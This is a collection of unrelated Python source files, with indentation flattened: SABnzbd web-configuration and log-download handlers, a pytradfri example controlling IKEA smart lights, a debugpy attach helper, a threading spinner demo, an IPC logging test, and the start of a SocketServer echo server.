enabled, m, h, day_numbers, action = line.split(' ', 4)
except:
continue
action = action.strip()
try:
action, value = action.split(' ', 1)
except:
value = ''
value = value.strip()
if value and not value.lower().strip('0123456789kmgtp%.'):
if '%' not in value and from_units(value) < 1.0:
value = T('off') # : "Off" value for speedlimit in scheduler
else:
if '%' not in value and 1 < int_conv(value) < 101:
value += '%'
value = value.upper()
if action in actions:
action = Ttemplate("sch-" + action)
else:
if action in ('enable_server', 'disable_server'):
try:
value = '"%s"' % config.get_servers()[value].displayname()
except KeyError:
value = '"%s" <<< %s' % (value, T('Undefined server!'))
action = Ttemplate("sch-" + action)
if action in ('pause_cat', 'resume_cat'):
action = Ttemplate("sch-" + action)
if value not in categories:
# Category name change
value = '"%s" <<< %s' % (value, T('Incorrect parameter'))
else:
value = '"%s"' % value
if day_numbers == "1234567":
days_of_week = "Daily"
elif day_numbers == "12345":
days_of_week = "Weekdays"
elif day_numbers == "67":
days_of_week = "Weekends"
else:
days_of_week = ", ".join([day_names.get(i, "**") for i in day_numbers])
item = (snum, '%02d' % int(h), '%02d' % int(m), days_of_week, '%s %s' % (action, value), enabled)
conf['taskinfo'].append(item)
snum += 1
actions_lng = {}
for action in actions:
actions_lng[action] = Ttemplate("sch-" + action)
actions_servers = {}
servers = config.get_servers()
for srv in servers:
actions_servers[srv] = servers[srv].displayname()
conf['actions_servers'] = actions_servers
conf['actions'] = actions
conf['actions_lng'] = actions_lng
conf['categories'] = categories
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_scheduling.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def addSchedule(self, **kwargs):
servers = config.get_servers()
minute = kwargs.get('minute')
hour = kwargs.get('hour')
days_of_week = ''.join([str(x) for x in kwargs.get('daysofweek', '')])
if not days_of_week:
days_of_week = '1234567'
action = kwargs.get('action')
arguments = kwargs.get('arguments')
arguments = arguments.strip().lower()
if arguments in ('on', 'enable'):
arguments = '1'
elif arguments in ('off', 'disable'):
arguments = '0'
if minute and hour and days_of_week and action:
if action == 'speedlimit':
if not arguments or arguments.strip('0123456789kmgtp%.'):
arguments = 0
elif action in _SCHED_ACTIONS:
arguments = ''
elif action in servers:
if arguments == '1':
arguments = action
action = 'enable_server'
else:
arguments = action
action = 'disable_server'
elif action in ('pause_cat', 'resume_cat'):
# Need original category name, not lowercased
arguments = arguments.strip()
else:
# Something else, leave empty
action = None
if action:
sched = cfg.schedules()
sched.append('%s %s %s %s %s %s' %
(1, minute, hour, days_of_week, action, arguments))
cfg.schedules.set(sched)
config.save_config()
scheduler.restart(force=True)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def delSchedule(self, **kwargs):
schedules = cfg.schedules()
line = kwargs.get('line')
if line and line in schedules:
schedules.remove(line)
cfg.schedules.set(schedules)
config.save_config()
scheduler.restart(force=True)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def toggleSchedule(self, **kwargs):
schedules = cfg.schedules()
line = kwargs.get('line')
if line:
for i, schedule in enumerate(schedules):
if schedule == line:
# Toggle the schedule
schedule_split = schedule.split()
schedule_split[0] = '%d' % (schedule_split[0] == '0')
schedules[i] = ' '.join(schedule_split)
break
cfg.schedules.set(schedules)
config.save_config()
scheduler.restart(force=True)
raise Raiser(self.__root)
##############################################################################
class ConfigCats(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['scripts'] = list_scripts(default=True)
conf['defdir'] = cfg.complete_dir.get_path()
categories = config.get_ordered_categories()
conf['have_cats'] = len(categories) > 1
slotinfo = []
for cat in categories:
cat['newzbin'] = cat['newzbin'].replace('"', '"')
slotinfo.append(cat)
# Add empty line
empty = {'name': '', 'order': '0', 'pp': '-1', 'script': '', 'dir': '', 'newzbin': '', 'priority': DEFAULT_PRIORITY}
slotinfo.insert(1, empty)
conf['slotinfo'] = slotinfo
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_cat.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def delete(self, **kwargs):
kwargs['section'] = 'categories'
kwargs['keyword'] = kwargs.get('name')
del_from_section(kwargs)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def save(self, **kwargs):
name = kwargs.get('name', '*')
if name == '*':
newname = name
else:
newname = re.sub('"', '', kwargs.get('newname', ''))
if newname:
if kwargs.get('dir'):
kwargs['dir'] = platform_encode(kwargs['dir'])
# Check if this cat-dir is not sub-folder of incomplete
if same_file(cfg.download_dir.get_path(), real_path(cfg.complete_dir.get_path(), kwargs['dir'])):
return T('Category folder cannot be a subfolder of the Temporary Download Folder.')
# Delete current one and replace with new one
if name:
config.delete('categories', name)
config.ConfigCat(newname.lower(), kwargs)
config.save_config()
raise Raiser(self.__root)
##############################################################################
SORT_LIST = (
'enable_tv_sorting', 'tv_sort_string', 'tv_categories',
'enable_movie_sorting', 'movie_sort_string', 'movie_sort_extra', 'movie_extra_folder',
'enable_date_sorting', 'date_sort_string', 'movie_categories', 'date_categories'
)
class ConfigSorting(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['complete_dir'] = cfg.complete_dir.get_path()
for kw in SORT_LIST:
conf[kw] = config.get_config('misc', kw)()
conf['categories'] = list_cats(False)
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_sorting.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveSorting(self, **kwargs):
try:
kwargs['movie_categories'] = kwargs['movie_cat']
except:
pass
try:
kwargs['date_categories'] = kwargs['date_cat']
except:
pass
try:
kwargs['tv_categories'] = kwargs['tv_cat']
except:
pass
for kw in SORT_LIST:
item = config.get_config('misc', kw)
value = kwargs.get(kw)
msg = item.set(value)
if msg:
return badParameterResponse(msg)
config.save_config()
raise Raiser(self.__root)
##############################################################################
LOG_API_RE = re.compile(r"(apikey|api)(=|:)[\w]+", re.I)
LOG_API_JSON_RE = re.compile(r"u'(apikey|api)': u'[\w]+'", re.I)
LOG_USER_RE = re.compile(r"(user|username)\s?=\s?[\S]+", re.I)
LOG_PASS_RE = re.compile(r"(password)\s?=\s?[\S]+", re.I)
LOG_INI_HIDE_RE = re.compile(r"(email_pwd|email_account|email_to|rating_api_key|pushover_token|pushover_userkey|pushbullet_apikey|prowl_apikey|growl_password|growl_server|IPv[4|6] address)\s?=\s?[\S]+", re.I)
LOG_HASH_RE = re.compile(r"([a-fA-F\d]{25})", re.I)
class Status(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
header = build_status(skip_dashboard=kwargs.get('skip_dashboard'))
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'status.tmpl'),
filter=FILTER, searchList=[header], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True)
def reset_quota(self, **kwargs):
BPSMeter.do.reset_quota(force=True)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def disconnect(self, **kwargs):
Downloader.do.disconnect()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def refresh_conn(self, **kwargs):
# No real action, just reload the page
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def showlog(self, **kwargs):
try:
sabnzbd.LOGHANDLER.flush()
except:
pass
# Fetch the INI and the log-data and add a message at the top
log_data = '--------------------------------\n\n'
log_data += 'The log includes a copy of your sabnzbd.ini with\nall usernames, passwords and API-keys removed.'
log_data += '\n\n--------------------------------\n'
log_data += open(sabnzbd.LOGFILE, "r").read()
log_data += open(config.get_filename(), 'r').read()
# We need to remove all passwords/usernames/api-keys
log_data = LOG_API_RE.sub("apikey=<APIKEY>", log_data)
log_data = LOG_API_JSON_RE.sub("'apikey':<APIKEY>'", log_data)
log_data = LOG_USER_RE.sub(r'\g<1>=<USER>', log_data)
log_data = LOG_PASS_RE.sub("password=<PASSWORD>", log_data)
log_data = LOG_INI_HIDE_RE.sub(r"\1 = <REMOVED>", log_data)
log_data = LOG_HASH_RE.sub("<HASH>", log_data)
# Try to replace the username
try:
import getpass
cur_user = getpass.getuser()
if cur_user:
log_data = log_data.replace(cur_user, '<USERNAME>')
except:
pass
# Set headers
cherrypy.response.headers['Content-Type'] = 'application/x-download;charset=utf-8'
cherrypy.response.headers['Content-Disposition'] = 'attachment;filename="sabnzbd.log"'
return log_data
@secured_expose(check_session_key=True)
def clearwarnings(self, **kwargs):
sabnzbd.GUIHANDLER.clear()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def change_loglevel(self, **kwargs):
cfg.log_level.set(kwargs.get('loglevel'))
config.save_config()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def unblock_server(self, **kwargs):
Downloader.do.unblock(kwargs.get('server'))
# Short sleep so that UI shows new server status
time.sleep(1.0)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def delete(self, **kwargs):
orphan_delete(kwargs)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def delete_all(self, **kwargs):
orphan_delete_all()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def add(self, **kwargs):
orphan_add(kwargs)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def add_all(self, **kwargs):
orphan_add_all()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def dashrefresh(self, **kwargs):
# This function is run when Refresh button on Dashboard is clicked
# Put the time consuming dashboard functions here; they only get executed when the user clicks the Refresh button
# PyStone
sabnzbd.PYSTONE_SCORE = getpystone()
# Diskspeed
sabnzbd.DOWNLOAD_DIR_SPEED = round(diskspeedmeasure(sabnzbd.cfg.download_dir.get_path()), 1)
time.sleep(1.0)
sabnzbd.COMPLETE_DIR_SPEED = round(diskspeedmeasure(sabnzbd.cfg.complete_dir.get_path()), 1)
raise Raiser(self.__root) # Refresh screen
def orphan_delete(kwargs):
path = kwargs.get('name')
if path:
path = platform_encode(path)
path = os.path.join(long_path(cfg.download_dir.get_path()), path)
logging.info('Removing orphaned job %s', path)
remove_all(path, recursive=True)
def orphan_delete_all():
paths = NzbQueue.do.scan_jobs(all=False, action=False)
for path in paths:
kwargs = {'name': path}
orphan_delete(kwargs)
def orphan_add(kwargs):
path = kwargs.get('name')
if path:
path = platform_encode(path)
path = os.path.join(long_path(cfg.download_dir.get_path()), path)
logging.info('Re-adding orphaned job %s', path)
NzbQueue.do.repair_job(path, None, None)
def orphan_add_all():
paths = NzbQueue.do.scan_jobs(all=False, action=False)
for path in paths:
kwargs = {'name': path}
orphan_add(kwargs)
def badParameterResponse(msg, ajax=None):
""" Return a html page with error message and a 'back' button """
if ajax:
return sabnzbd.api.report('json', error=msg)
else:
return '''
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<title>SABnzbd %s - %s</title>
</head>
<body>
<h3>%s</h3>
%s
<br><br>
<FORM><INPUT TYPE="BUTTON" VALUE="%s" ONCLICK="history.go(-1)"></FORM>
</body>
</html>
''' % (sabnzbd.__version__, T('ERROR:'), T('Incorrect parameter'), unicoder(msg), T('Back'))
def ShowString(name, string):
""" Return a html page listing a file and a 'back' button """
try:
msg = TRANS(string)
except:
msg = "Encoding Error\n"
return '''
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<title>%s</title>
</head>
<body>
<FORM><INPUT TYPE="BUTTON" VALUE="%s" ONCLICK="history.go(-1)"></FORM>
<h3>%s</h3>
<code><pre>%s</pre></code>
</body>
</html>
''' % (xml_name(name), T('Back'), xml_name(name), escape(unicoder(msg)))
def GetRssLog(feed):
def make_item(job):
# Make a copy
job = job.copy()
# Now we apply some formatting
job['title'] = xml_name(job['title'])
job['skip'] = '*' * int(job.get('status', '').endswith('*'))
# These fields could be empty
job['cat'] = job.get('cat', '')
job['size'] = job.get('size', '')
job['infourl'] = job.get('infourl', '')
# Auto-fetched jobs didn't have these fields set
if job.get('url'):
job['baselink'] = get_base_url(job.get('url'))
if sabnzbd.rss.special_rss_site(job.get('url')):
job['nzbname'] = ''
else:
job['nzbname'] = xml_name(job['title'])
else:
job['baselink'] = ''
job['nzbname'] = xml_name(job['title'])
if job.get('size', 0):
job['size_units'] = to_units(job['size'])
else:
job['size_units'] = '-'
# And we add extra fields for sorting
if job.get('age', 0):
job['age_ms'] = time.mktime(job['age'].timetuple())
job['age'] = calc_age(job['age'], True)
else:
job['age_ms'] = ''
job['age'] = ''
if job.get('time_downloaded'):
job['time_downloaded_ms'] = time.mktime(job['time_downloaded'])
job['time_downloaded'] = time.strftime(time_format('%H:%M %a %d %b'), job['time_downloaded']).decode(codepage)
else:
job['time_downloaded_ms'] = ''
job['time_downloaded'] = ''
return job
jobs = sabnzbd.rss.show_result(feed).values()
good, bad, done = ([], [], [])
for job in jobs:
if job['status'][0] == 'G':
good.append(make_item(job))
elif job['status'][0] == 'B':
bad.append(make_item(job))
elif job['status'] == 'D':
done.append(make_item(job))
try:
# Sort based on actual age, in try-catch just to be sure
good.sort(key=lambda job: job['age_ms'], reverse=True)
bad.sort(key=lambda job: job['age_ms'], reverse=True)
done.sort(key=lambda job: job['time_downloaded_ms'], reverse=True)
except:
# Let the javascript do it then..
pass
return done, good, bad
##############################################################################
LIST_EMAIL = (
'email_endjob', 'email_cats', 'email_full',
'email_server', 'email_to', 'email_from',
'email_account', 'email_pwd', 'email_rss'
)
LIST_GROWL = ('growl_enable', 'growl_cats', 'growl_server', 'growl_password',
'growl_prio_startup', 'growl_prio_download', 'growl_prio_pp', 'growl_prio_complete', 'growl_prio_failed',
'growl_prio_disk_full', 'growl_prio_warning', 'growl_prio_error', 'growl_prio_queue_done', 'growl_prio_other',
'growl_prio_new_login')
LIST_NCENTER = ('ncenter_enable', 'ncenter_cats',
'ncenter_prio_startup', 'ncenter_prio_download', 'ncenter_prio_pp', 'ncenter_prio_complete', 'ncenter_prio_failed',
'ncenter_prio_disk_full', 'ncenter_prio_warning', 'ncenter_prio_error', 'ncenter_prio_queue_done', 'ncenter_prio_other',
'ncenter_prio_new_login')
LIST_ACENTER = ('acenter_enable', 'acenter_cats',
'acenter_prio_startup', 'acenter_prio_download', 'acenter_prio_pp', 'acenter_prio_complete', 'acenter_prio_failed',
'acenter_prio_disk_full', 'acenter_prio_warning', 'acenter_prio_error', 'acenter_prio_queue_done', 'acenter_prio_other',
'acenter_prio_new_login')
LIST_NTFOSD = ('ntfosd_enable', 'ntfosd_cats',
'ntfosd_prio_startup', 'ntfosd_prio_download', 'ntfosd_prio_pp', 'ntfosd_prio_complete', 'ntfosd_prio_failed',
'ntfosd_prio_disk_full', 'ntfosd_prio_warning', 'ntfosd_prio_error', 'ntfosd_prio_queue_done', 'ntfosd_prio_other',
'ntfosd_prio_new_login')
LIST_PROWL = ('prowl_enable', 'prowl_cats', 'prowl_apikey',
'prowl_prio_startup', 'prowl_prio_download', 'prowl_prio_pp', 'prowl_prio_complete', 'prowl_prio_failed',
'prowl_prio_disk_full', 'prowl_prio_warning', 'prowl_prio_error', 'prowl_prio_queue_done', 'prowl_prio_other',
'prowl_prio_new_login')
LIST_PUSHOVER = ('pushover_enable', 'pushover_cats', 'pushover_token', 'pushover_userkey', 'pushover_device',
'pushover_prio_startup', 'pushover_prio_download', 'pushover_prio_pp', 'pushover_prio_complete', 'pushover_prio_failed',
'pushover_prio_disk_full', 'pushover_prio_warning', 'pushover_prio_error', 'pushover_prio_queue_done', 'pushover_prio_other',
'pushover_prio_new_login', 'pushover_emergency_retry', 'pushover_emergency_expire')
LIST_PUSHBULLET = ('pushbullet_enable', 'pushbullet_cats', 'pushbullet_apikey', 'pushbullet_device',
'pushbullet_prio_startup', 'pushbullet_prio_download', 'pushbullet_prio_pp', 'pushbullet_prio_complete', 'pushbullet_prio_failed',
'pushbullet_prio_disk_full', 'pushbullet_prio_warning', 'pushbullet_prio_error', 'pushbullet_prio_queue_done', 'pushbullet_prio_other',
'pushbullet_prio_new_login')
LIST_NSCRIPT = ('nscript_enable', 'nscript_cats', 'nscript_script', 'nscript_parameters',
'nscript_prio_startup', 'nscript_prio_download', 'nscript_prio_pp', 'nscript_prio_complete', 'nscript_prio_failed',
'nscript_prio_disk_full', 'nscript_prio_warning', 'nscript_prio_error', 'nscript_prio_queue_done', 'nscript_prio_other',
'nscript_prio_new_login')
class ConfigNotify(object):
def __init__(self, root):
self.__root = root
self.__lastmail = None
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['categories'] = list_cats(False)
conf['lastmail'] = self.__lastmail
conf['have_growl'] = True
conf['have_ntfosd'] = sabnzbd.notifier.have_ntfosd()
conf['have_ncenter'] = sabnzbd.DARWIN and bool(sabnzbd.notifier.ncenter_path())
conf['scripts'] = list_scripts(default=False, none=True)
for kw in LIST_EMAIL:
conf[kw] = config.get_config('misc', kw).get_string()
for kw in LIST_GROWL:
try:
conf[kw] = config.get_config('growl', kw)()
except:
logging.debug('MISSING KW=%s', kw)
for kw in LIST_PROWL:
conf[kw] = config.get_config('prowl', kw)()
for kw in LIST_PUSHOVER:
conf[kw] = config.get_config('pushover', kw)()
for kw in LIST_PUSHBULLET:
conf[kw] = config.get_config('pushbullet', kw)()
for kw in LIST_NCENTER:
conf[kw] = config.get_config('ncenter', kw)()
for kw in LIST_ACENTER:
conf[kw] = config.get_config('acenter', kw)()
for kw in LIST_NTFOSD:
conf[kw] = config.get_config('ntfosd', kw)()
for kw in LIST_NSCRIPT:
conf[kw] = config.get_config('nscript', kw)()
conf['notify_keys'] = sabnzbd.constants.NOTIFY_KEYS
conf['notify_texts'] = sabnzbd.notifier.NOTIFICATION
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_notify.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveEmail(self, **kwargs):
ajax = kwargs.get('ajax')
for kw in LIST_EMAIL:
msg = config.get_config('misc', kw).set(platform_encode(kwargs.get(kw)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
for kw in LIST_GROWL:
msg = config.get_config('growl', kw).set(platform_encode(kwargs.get(kw)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
for kw in LIST_NCENTER:
msg = config.get_config('ncenter', kw).set(platform_encode(kwargs.get(kw)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
for kw in LIST_ACENTER:
msg = config.get_config('acenter', kw).set(platform_encode(kwargs.get(kw)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
for kw in LIST_NTFOSD:
msg = config.get_config('ntfosd', kw).set(platform_encode(kwargs.get(kw)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
for kw in LIST_PROWL:
msg = config.get_config('prowl', kw).set(platform_encode(kwargs.get(kw)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
for kw in LIST_PUSHOVER:
msg = config.get_config('pushover', kw).set(platform_encode(kwargs.get(kw)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
for kw in LIST_PUSHBULLET:
msg = config.get_config('pushbullet', kw).set(platform_encode(kwargs.get(kw, 0)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
for kw in LIST_NSCRIPT:
msg = config.get_config('nscript', kw).set(platform_encode(kwargs.get(kw, 0)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
config.save_config()
self.__lastmail = None
if ajax:
return sabnzbd.api.report('json')
else:
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def testmail(self, **kwargs):
self.__lastmail = _api_test_email(name=None, output=None, kwargs=None)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def testnotification(self, **kwargs):
_api_test_notif(name=None, output=None, kwargs=None)
raise Raiser(self.__root)
def rss_history(url, limit=50, search=None):
url = url.replace('rss', '')
youngest = None
rss = RSS()
rss.channel.title = "SABnzbd History"
rss.channel.description = "Overview of completed downloads"
rss.channel.link = "https://sabnzbd.org/"
rss.channel.language = "en"
items, _fetched_items, _max_items = build_history(limit=limit, search=search)
for history in items:
item = Item()
item.pubDate = std_time(history['completed'])
item.title = history['name']
if not youngest:
youngest = history['completed']
elif history['completed'] < youngest:
youngest = history['completed']
if history['url_info']:
item.link = history['url_info']
else:
item.link = url
item.guid = history['nzo_id']
stageLine = []
for stage in history['stage_log']:
stageLine.append("<tr><dt>Stage %s</dt>" % stage['name'])
actions = []
for action in stage['actions']:
actions.append("<dd>%s</dd>" % action)
actions.sort()
actions.reverse()
for act in actions:
stageLine.append(act)
stageLine.append("</tr>")
item.description = ''.join(stageLine)
rss.addItem(item)
rss.channel.lastBuildDate = std_time(youngest)
rss.channel.pubDate = std_time(time.time())
return rss.write()
def rss_warnings():
""" Return an RSS feed with last warnings/errors """
rss = RSS()
rss.channel.title = "SABnzbd Warnings"
rss.channel.description = "Overview of warnings/errors"
rss.channel.link = "https://sabnzbd.org/"
rss.channel.language = "en"
for warn in sabnzbd.GUIHANDLER.content():
item = Item()
item.title = warn
rss.addItem(item)
rss.channel.lastBuildDate = std_time(time.time())
rss.channel.pubDate = rss.channel.lastBuildDate
return rss.write()
|
example_sync.py
|
#!/usr/bin/env python3
"""
This is an example of how the pytradfri-library can be used sync.
To run the script, do the following:
$ pip3 install pytradfri
$ Download this file (example_sync.py)
$ python3 example_sync.py <IP>
Where <IP> is the address to your IKEA gateway. The first time
running you will be asked to input the 'Security Code' found on
the back of your IKEA gateway.
"""
# Hack to allow relative import above top level package
import sys
import os
folder = os.path.dirname(os.path.abspath(__file__)) # noqa
sys.path.insert(0, os.path.normpath("%s/.." % folder)) # noqa
from pytradfri import Gateway
from pytradfri.api.libcoap_api import APIFactory
from pytradfri.error import PytradfriError
from pytradfri.util import load_json, save_json
import uuid
import argparse
import threading
import time
CONFIG_FILE = "tradfri_standalone_psk.conf"
parser = argparse.ArgumentParser()
parser.add_argument(
"host", metavar="IP", type=str, help="IP Address of your Tradfri gateway"
)
parser.add_argument(
"-K",
"--key",
dest="key",
required=False,
help="Security code found on your Tradfri gateway",
)
args = parser.parse_args()
if args.host not in load_json(CONFIG_FILE) and args.key is None:
print(
"Please provide the 'Security Code' on the back of your " "Tradfri gateway:",
end=" ",
)
key = input().strip()
if len(key) != 16:
raise PytradfriError("Invalid 'Security Code' provided.")
else:
args.key = key
def run():
# Assign configuration variables.
# The configuration check takes care they are present.
conf = load_json(CONFIG_FILE)
try:
identity = conf[args.host].get("identity")
psk = conf[args.host].get("key")
api_factory = APIFactory(host=args.host, psk_id=identity, psk=psk)
except KeyError:
identity = uuid.uuid4().hex
api_factory = APIFactory(host=args.host, psk_id=identity)
try:
psk = api_factory.generate_psk(args.key)
print("Generated PSK: ", psk)
conf[args.host] = {"identity": identity, "key": psk}
save_json(CONFIG_FILE, conf)
except AttributeError:
raise PytradfriError(
"Please provide the 'Security Code' on the "
"back of your Tradfri gateway using the "
"-K flag."
)
api = api_factory.request
gateway = Gateway()
devices_command = gateway.get_devices()
devices_commands = api(devices_command)
devices = api(devices_commands)
lights = [dev for dev in devices if dev.has_light_control]
# Print all lights
print(lights)
# Lights can be accessed by its index, so lights[1] is the second light
if lights:
light = lights[0]
else:
print("No lights found!")
light = None
if light:
# Example 1: checks state of the light (true=on)
print("Is on:", light.light_control.lights[0].state)
# Example 2: get dimmer level of the light
print("Dimmer:", light.light_control.lights[0].dimmer)
# Example 3: What is the name of the light
print("Name:", light.name)
# Example 4: Set the light level of the light
dim_command = light.light_control.set_dimmer(254)
api(dim_command)
# Example 5: Change color of the light
# f5faf6 = cold | f1e0b5 = normal | efd275 = warm
color_command = light.light_control.set_hex_color("efd275")
api(color_command)
# Get all blinds
blinds = [dev for dev in devices if dev.has_blind_control]
# Print all blinds
print(blinds)
if blinds:
blind = blinds[0]
else:
print("No blinds found!")
blind = None
if blind:
blind_command = blinds[0].blind_control.set_state(50)
api(blind_command)
tasks_command = gateway.get_smart_tasks()
tasks_commands = api(tasks_command)
tasks = api(tasks_commands)
# Example 6: Return the transition time (in minutes) for task#1
if tasks:
print(tasks[0].task_control.tasks[0].transition_time)
# Example 7: Set the dimmer stop value to 30 for light#1 in task#1
dim_command_2 = tasks[0].start_action.devices[0].item_controller.set_dimmer(30)
api(dim_command_2)
if light:
def observe_callback(updated_device):
light = updated_device.light_control.lights[0]
print("Received message for: %s" % light)
def observe_err_callback(err):
print("observe error:", err)
def worker(light):
api(light.observe(observe_callback, observe_err_callback, duration=120))
for light in lights:
threading.Thread(target=worker, args=(light,), daemon=True).start()
print("Sleeping for 2 min to listen for more observation events")
print("Try altering any light in the app, and watch the events!")
time.sleep(120)
run()
|
_debugpy.py
|
"""Tools to enable debugpy attachment to a process."""
import threading
import debugpy
import portpicker
_dap_port = None
def enable_attach_async():
"""Enable a debugger to attach to this process.
Returns:
The debug adapter port which can be connected to using the Debug Adapter
Proxy protocol.
"""
global _dap_port
if _dap_port:
return _dap_port
# Changes here should be reflected in our internal debugpy config.
debugpy.configure({
# We don't use qt, so we disable support to avoid spurious imports.
'qt': 'none',
# b/180567283: Disable monkey patching subprocess calls which isn't
# needed for Colab and can cause issues.
'subProcess': False,
})
_dap_port = portpicker.pick_unused_port()
main_thread = threading.current_thread()
# Prevent debugpy from tracing the current thread.
main_thread.pydev_do_not_trace = True
def attachment_entry():
# The client will retry the connection a few times to avoid the inherent
# raciness of this.
debugpy.listen(_dap_port)
# Debugger tracing isn't needed for just tracebacks, but if full debugging
# is needed then it needs to be re-enabled while debugging.
# We want to use `pydevd.stoptrace` but if this is called before we have
# connected to the debug adapter from the client then it'll send a
# terminate to the adapter and the adapter will auto-exit before we can
# connect to it. After the connection then it's OK to terminate since the
# adapter will not close while there are active connections.
threading.settrace(None) # for all future threads
try:
# Stop debugpy from tracing newly created threads.
from _pydev_bundle import pydev_monkey # pylint: disable=g-import-not-at-top
pydev_monkey.undo_patch_thread_modules()
except ModuleNotFoundError:
# _pydev_bundle may be vendored into either location.
from debugpy.third_party.pydevd._pydev_bundle import pydev_monkey # pylint: disable=g-import-not-at-top
pydev_monkey.undo_patch_thread_modules()
# Clear the trace flag to allow fetching stack traces.
main_thread.pydev_do_not_trace = False
# debugpy.listen will spin up another process then start listening for
# connections from that process. This can take a second or so, but most of it
# is not by this process. Doing this on a separate thread reduces the impact
# on kernel initialization.
threading.Thread(target=attachment_entry).start()
return _dap_port
|
thread-spinner.py
|
import threading
import itertools
import sys
import time
class Signal:
go = True
def spin(msg, signal):
write, flush = sys.stdout.write, sys.stdout.flush
for char in itertools.cycle('|/-\\'):
status = msg + ' ' + char
write(status)
flush()
write('\x08' * len(status))
time.sleep(.1)
if not signal.go:
break
write(' ' * len(status) + '\x08' * len(status))
def slow_function():
time.sleep(10)
return 42
def supervisor():
signal = Signal()
spinner = threading.Thread(target=spin, args=('thinking!', signal))
print('spinner object:', spinner)
spinner.start()
result = slow_function()
signal.go = False
spinner.join()
return result
def main():
result = supervisor()
if __name__ == '__main__':
main()
|
test_ipc_log_listener.py
|
import tempfile
import logging
from multiprocessing import Process
from pathlib import Path
import uuid
import pytest
from trinity._utils.logging import IPCListener, IPCHandler
@pytest.fixture
def ipc_path():
with tempfile.TemporaryDirectory() as dir:
yield Path(dir) / "logging.ipc"
def test_queued_logging(ipc_path):
class HandlerForTest(logging.Handler):
def __init__(self):
self.logs = []
super().__init__()
def handle(self, record):
self.logs.append(record)
def do_other_process_logging(ipc_path):
queue_handler = IPCHandler.connect(ipc_path)
queue_handler.setLevel(logging.DEBUG)
logger = logging.getLogger(str(uuid.uuid4()))
logger.addHandler(queue_handler)
logger.setLevel(logging.DEBUG)
logger.error('error log')
logger.info('info log')
logger.debug('debug log')
queue_handler.close()
proc = Process(target=do_other_process_logging, args=(ipc_path,))
logger = logging.getLogger(str(uuid.uuid4()))
handler = HandlerForTest()
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
queue_listener = IPCListener(handler)
with queue_listener.run(ipc_path):
assert len(handler.logs) == 0
proc.start()
proc.join()
assert len(handler.logs) == 3
error_log, info_log, debug_log = handler.logs
assert 'error log' in error_log.message
assert 'info log' in info_log.message
assert 'debug log' in debug_log.message
|
socketServer.py
|
import logging
import sys
import SocketServer
import time
logging.basicConfig(level=logging.DEBUG,
format='%(name)s: %(message)s',
)
class EchoRequestHandler(SocketServer.BaseRequestHandler):
def __init__(self, request, client_address, server):
self.logger = logging.getLogger('EchoRequestHandler')
self.logger.debug('__init__')
SocketServer.BaseRequestHandler.__init__(self, request, client_address, server)
return
def setup(self):
self.logger.debug('setup')
return SocketServer.BaseRequestHandler.setup(self)
def handle(self):
self.logger.debug('handle')
# Echo the back to the client
data = self.request.recv(1024)
self.logger.debug('recv()->"%s"', data)
self.request.send(data)
return
def finish(self):
self.logger.debug('finish')
return SocketServer.BaseRequestHandler.finish(self)
class EchoServer(SocketServer.TCPServer):
def __init__(self, server_address, handler_class=EchoRequestHandler):
self.logger = logging.getLogger('EchoServer')
